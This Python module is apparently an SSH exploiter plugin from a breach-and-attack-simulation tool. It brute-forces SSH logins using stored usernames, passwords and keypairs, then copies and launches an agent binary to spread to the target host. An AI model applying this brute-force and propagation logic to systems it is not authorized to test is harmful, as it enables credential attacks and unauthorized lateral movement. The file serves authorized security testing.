import logging
from functools import partial
from pprint import pformat
from typing import Any, Dict, Sequence

# common imports
from common.credentials import Password, SSHKeypair, Username
from common.event_queue import IAgentEventPublisher
from common.types import AgentID, Event
from common.utils.code_utils import del_key

# dependencies to get rid of or internalize
from infection_monkey.exploit import IAgentBinaryRepository, IAgentOTPProvider
from infection_monkey.exploit.tools import (
    BruteForceCredentialsProvider,
    BruteForceExploiter,
    all_tcp_ports_are_closed,
    generate_brute_force_credentials,
    identity_type_filter,
    secret_type_filter,
)
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.propagation_credentials_repository import IPropagationCredentialsRepository

from .ssh_command_builder import build_ssh_command
from .ssh_options import SSHOptions
from .ssh_remote_access_client import SSH_PORTS
from .ssh_remote_access_client_factory import SSHRemoteAccessClientFactory

logger = logging.getLogger(__name__)


def should_attempt_exploit(host: TargetHost) -> bool:
    return not all_tcp_ports_are_closed(host, SSH_PORTS)


class Plugin:
    def __init__(
        self,
        *,
        plugin_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        agent_binary_repository: IAgentBinaryRepository,
        propagation_credentials_repository: IPropagationCredentialsRepository,
        otp_provider: IAgentOTPProvider,
        **kwargs,
    ):
        self._plugin_name = plugin_name
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._agent_binary_repository = agent_binary_repository
        credentials_generator = partial(
            generate_brute_force_credentials,
            identity_filter=identity_type_filter([Username]),
            secret_filter=secret_type_filter([Password, SSHKeypair]),
        )
        self._credentials_provider = BruteForceCredentialsProvider(
            credentials_repository=propagation_credentials_repository,
            generate_brute_force_credentials=credentials_generator,
        )
        self._otp_provider = otp_provider

    def run(
        self,
        *,
        host: TargetHost,
        servers: Sequence[str],
        current_depth: int,
        options: Dict[str, Any],
        interrupt: Event,
        **kwargs,
    ) -> ExploiterResult:
        # HTTP ports options are hack because they are needed in fingerprinters
        del_key(options, "http_ports")

        try:
            logger.debug(f"Parsing options: {pformat(options)}")
            ssh_options = SSHOptions(**options)
        except Exception as err:
            msg = f"Failed to parse SSH options: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        if not should_attempt_exploit(host):
            msg = f"Host {host.ip} has no open SSH ports"
            logger.debug(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

        command_builder = partial(
            build_ssh_command,
            agent_id=self._agent_id,
            target_host=host,
            servers=servers,
            current_depth=current_depth,
            otp_provider=self._otp_provider,
        )

        ssh_exploit_client_factory = SSHRemoteAccessClientFactory(
            host=host, options=ssh_options, command_builder=command_builder
        )

        brute_force_exploiter = BruteForceExploiter(
            exploiter_name=self._plugin_name,
            agent_id=self._agent_id,
            destination_path=get_agent_dst_path(host),
            exploit_client_factory=ssh_exploit_client_factory,
            get_credentials=self._credentials_provider,
            agent_binary_repository=self._agent_binary_repository,
            agent_event_publisher=self._agent_event_publisher,
            tags={"ssh-exploiter"},
        )

        try:
            logger.debug(f"Running SSH exploiter on host {host.ip}")
            return brute_force_exploiter.exploit_host(host, interrupt)
        except Exception as err:
            msg = f"An unexpected exception occurred while attempting to exploit host: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)
